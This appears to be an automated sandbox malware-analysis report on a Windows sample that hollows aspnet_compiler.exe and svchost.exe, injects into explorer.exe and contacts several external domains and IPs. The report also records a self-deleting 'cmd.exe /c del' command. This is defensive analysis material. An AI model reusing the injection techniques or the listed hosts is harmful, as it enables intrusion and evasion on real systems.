Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153F716 mov eax, dword ptr fs:[00000030h] 2_2_0153F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AFF10 mov eax, dword ptr fs:[00000030h] 2_2_015AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AFF10 mov eax, dword ptr fs:[00000030h] 2_2_015AFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E070D mov eax, dword ptr fs:[00000030h] 2_2_015E070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E070D mov eax, dword ptr fs:[00000030h] 2_2_015E070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A70E mov eax, dword ptr fs:[00000030h] 2_2_0154A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A70E mov eax, dword ptr fs:[00000030h] 2_2_0154A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154E730 mov eax, dword ptr fs:[00000030h] 2_2_0154E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B73D mov eax, dword ptr fs:[00000030h] 2_2_0153B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B73D mov eax, dword ptr fs:[00000030h] 2_2_0153B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01514F2E mov eax, dword ptr fs:[00000030h] 2_2_01514F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01514F2E mov eax, dword ptr fs:[00000030h] 2_2_01514F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015537F5 mov eax, dword ptr fs:[00000030h] 2_2_015537F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01528794 mov eax, dword ptr fs:[00000030h] 2_2_01528794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597794 mov eax, dword ptr fs:[00000030h] 2_2_01597794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597794 mov eax, dword ptr fs:[00000030h] 2_2_01597794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597794 mov eax, dword ptr fs:[00000030h] 2_2_01597794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h] 2_2_01527E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAE44 mov eax, dword ptr fs:[00000030h] 2_2_015DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAE44 mov eax, dword ptr fs:[00000030h] 2_2_015DAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h] 2_2_0153AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h] 2_2_0153AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h] 2_2_0153AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h] 2_2_0153AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h] 2_2_0153AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152766D mov eax, dword ptr fs:[00000030h] 2_2_0152766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A61C mov eax, dword ptr fs:[00000030h] 2_2_0154A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A61C mov eax, dword ptr fs:[00000030h] 2_2_0154A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h] 2_2_0151C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h] 2_2_0151C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h] 2_2_0151C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01548E00 mov eax, dword ptr fs:[00000030h] 2_2_01548E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D1608 mov eax, dword ptr fs:[00000030h] 2_2_015D1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CFE3F mov eax, dword ptr fs:[00000030h] 2_2_015CFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151E620 mov eax, dword ptr fs:[00000030h] 2_2_0151E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8ED6 mov eax, dword ptr fs:[00000030h] 2_2_015E8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01558EC7 mov eax, dword ptr fs:[00000030h] 2_2_01558EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015436CC mov eax, dword ptr fs:[00000030h] 2_2_015436CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CFEC0 mov eax, dword ptr fs:[00000030h] 2_2_015CFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015276E2 mov eax, dword ptr fs:[00000030h] 2_2_015276E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015416E0 mov ecx, dword ptr fs:[00000030h] 2_2_015416E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AFE87 mov eax, dword ptr fs:[00000030h] 2_2_015AFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h] 2_2_015E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h] 2_2_015E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h] 2_2_015E0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015946A7 mov eax, dword ptr fs:[00000030h] 2_2_015946A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03952397 mov eax, dword ptr fs:[00000030h] 12_2_03952397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395B390 mov eax, dword ptr fs:[00000030h] 12_2_0395B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394EB9A mov eax, dword ptr fs:[00000030h] 12_2_0394EB9A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394EB9A mov eax, dword ptr fs:[00000030h] 12_2_0394EB9A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E138A mov eax, dword ptr fs:[00000030h] 12_2_039E138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03931B8F mov eax, dword ptr fs:[00000030h] 12_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03931B8F mov eax, dword ptr fs:[00000030h] 12_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039DD380 mov ecx, dword ptr fs:[00000030h] 12_2_039DD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395138B mov eax, dword ptr fs:[00000030h] 12_2_0395138B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395138B mov eax, dword ptr fs:[00000030h] 12_2_0395138B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395138B mov eax, dword ptr fs:[00000030h] 12_2_0395138B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h] 12_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h] 12_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h] 12_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F5BA5 mov eax, dword ptr fs:[00000030h] 12_2_039F5BA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039A53CA mov eax, dword ptr fs:[00000030h] 12_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039A53CA mov eax, dword ptr fs:[00000030h] 12_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039553C5 mov eax, dword ptr fs:[00000030h] 12_2_039553C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h] 12_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394DBE9 mov eax, dword ptr fs:[00000030h] 12_2_0394DBE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039D23E3 mov ecx, dword ptr fs:[00000030h] 12_2_039D23E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039D23E3 mov ecx, dword ptr fs:[00000030h] 12_2_039D23E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039D23E3 mov eax, dword ptr fs:[00000030h] 12_2_039D23E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E131B mov eax, dword ptr fs:[00000030h] 12_2_039E131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h] 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F8B58 mov eax, dword ptr fs:[00000030h] 12_2_039F8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392F358 mov eax, dword ptr fs:[00000030h] 12_2_0392F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392DB40 mov eax, dword ptr fs:[00000030h] 12_2_0392DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h] 12_2_0393F370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h] 12_2_0393F370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h] 12_2_0393F370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03953B7A mov eax, dword ptr fs:[00000030h] 12_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03953B7A mov eax, dword ptr fs:[00000030h] 12_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392DB60 mov ecx, dword ptr fs:[00000030h] 12_2_0392DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395D294 mov eax, dword ptr fs:[00000030h] 12_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395D294 mov eax, dword ptr fs:[00000030h] 12_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 12_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393AAB0 mov eax, dword ptr fs:[00000030h] 12_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395FAB0 mov eax, dword ptr fs:[00000030h] 12_2_0395FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h] 12_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h] 12_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h] 12_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h] 12_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h] 12_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03952ACB mov eax, dword ptr fs:[00000030h] 12_2_03952ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03952AE4 mov eax, dword ptr fs:[00000030h] 12_2_03952AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h] 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03925210 mov eax, dword ptr fs:[00000030h] 12_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03925210 mov ecx, dword ptr fs:[00000030h] 12_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03925210 mov eax, dword ptr fs:[00000030h] 12_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03925210 mov eax, dword ptr fs:[00000030h] 12_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392AA16 mov eax, dword ptr fs:[00000030h] 12_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392AA16 mov eax, dword ptr fs:[00000030h] 12_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03943A1C mov eax, dword ptr fs:[00000030h] 12_2_03943A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039EAA16 mov eax, dword ptr fs:[00000030h] 12_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039EAA16 mov eax, dword ptr fs:[00000030h] 12_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03938A0A mov eax, dword ptr fs:[00000030h] 12_2_03938A0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h] 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E1229 mov eax, dword ptr fs:[00000030h] 12_2_039E1229
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.89.61 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.179 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.186.33.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lotsimprovements.com
Source: C:\Windows\explorer.exe Network Connect: 209.15.40.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.chambaultfleurs.com
Source: C:\Windows\explorer.exe Domain query: www.zyaxious.website
Source: C:\Windows\explorer.exe Domain query: www.hofwimmer.com
Source: C:\Windows\explorer.exe Network Connect: 61.14.208.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mentalnayaarifmetika.online
Source: C:\Windows\explorer.exe Domain query: www.doxofcolor.com
Source: C:\Windows\explorer.exe Network Connect: 206.189.50.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.myamazonloan.net
Source: C:\Windows\explorer.exe Domain query: www.huvao.com
Source: C:\Windows\explorer.exe Domain query: www.xn--hj2bz6fwvan2be1g5tb.com
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: CB0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DB2008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3968 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: explorer.exe, 00000003.00000000.271766128.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333612659.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.286969510.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000003.00000000.277137044.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.303144271.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333647226.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.287002544.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\fooYgfbxno.exe Queries volume information: C:\Users\user\Desktop\fooYgfbxno.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fooYgfbxno.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
